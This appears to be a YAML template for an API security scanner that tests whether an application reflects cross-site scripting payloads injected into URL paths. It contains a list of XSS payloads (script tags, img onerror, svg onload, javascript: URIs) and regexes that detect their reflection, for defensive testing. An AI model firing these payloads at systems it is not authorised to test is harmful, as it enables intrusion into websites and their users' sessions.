---
id: XSS_URL_PATH
info:
  name: "Cross-Site Scripting (XSS) - URL Path"
  description: "Tests whether the application is vulnerable to XSS through URL path manipulation."
  details: "This test injects XSS payloads into URL paths to check if the application reflects them without proper sanitization, indicating an XSS vulnerability."
  impact: "XSS vulnerabilities can allow attackers to steal sensitive data, hijack user sessions, deface web pages, and inject malicious content."
  category:
    name: XSS
    shortName: XSS
    displayName: Cross-site scripting (XSS)
  subCategory: XSS_URL_PATH
  severity: HIGH
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
    - XSS
  references:
    - "https://owasp.org/www-community/attacks/xss/"
  cwe:
    - CWE-79
  cve:
    - CVE-2022-34196
    - CVE-2023-44764
    - CVE-2021-35976
    - CVE-2015-1159
    - CVE-2023-24737
    - CVE-2020-25495

attributes:
  nature: INTRUSIVE
  plan: STANDARD
  duration: FAST

api_selection_filters:
  method:
    contains_either:
      - GET
      - POST
      - PUT
      - PATCH
      - DELETE
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  url:
    extract: urlVar

wordLists:
  xssPayloads:
    - '%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
    - '<script>alert(document.domain)</script>'
    - '<img src=x onerror=alert(document.domain)>'
    - '<svg onload=alert(document.domain)>'
    - 'javascript:alert(document.domain)'
    - '<iframe src=javascript:alert(document.domain)>'
    - '"><script>alert(document.domain)</script>'
    - "'><script>alert(document.domain)</script>"
    - '"><img src=x onerror=alert(document.domain)>'
    - "'><img src=x onerror=alert(document.domain)>"

execute:
  type: single
  requests:
    - req:
        - modify_url:
            regex_replace:
              regex: \/$
              replace_with: ''
        - modify_url: ${urlVar}/${xssPayloads}

validate:
  response_code:
    gte: 200
    lt: 500
  response_payload:
    or:
      - contains_either:
          - "<script>alert(document.domain)</script>"
          - "<img src=x onerror=alert(document.domain)>"
          - "<svg onload=alert(document.domain)>"
          - "javascript:alert(document.domain)"
          - "<iframe src=javascript:alert(document.domain)>"
      - regex: "(?i)<script[^>]*>alert\\(document\\.domain\\)</script>"
      - regex: "(?i)<img[^>]*src[^>]*onerror[^>]*alert\\(document\\.domain\\)"
      - regex: "(?i)<svg[^>]*onload[^>]*alert\\(document\\.domain\\)"
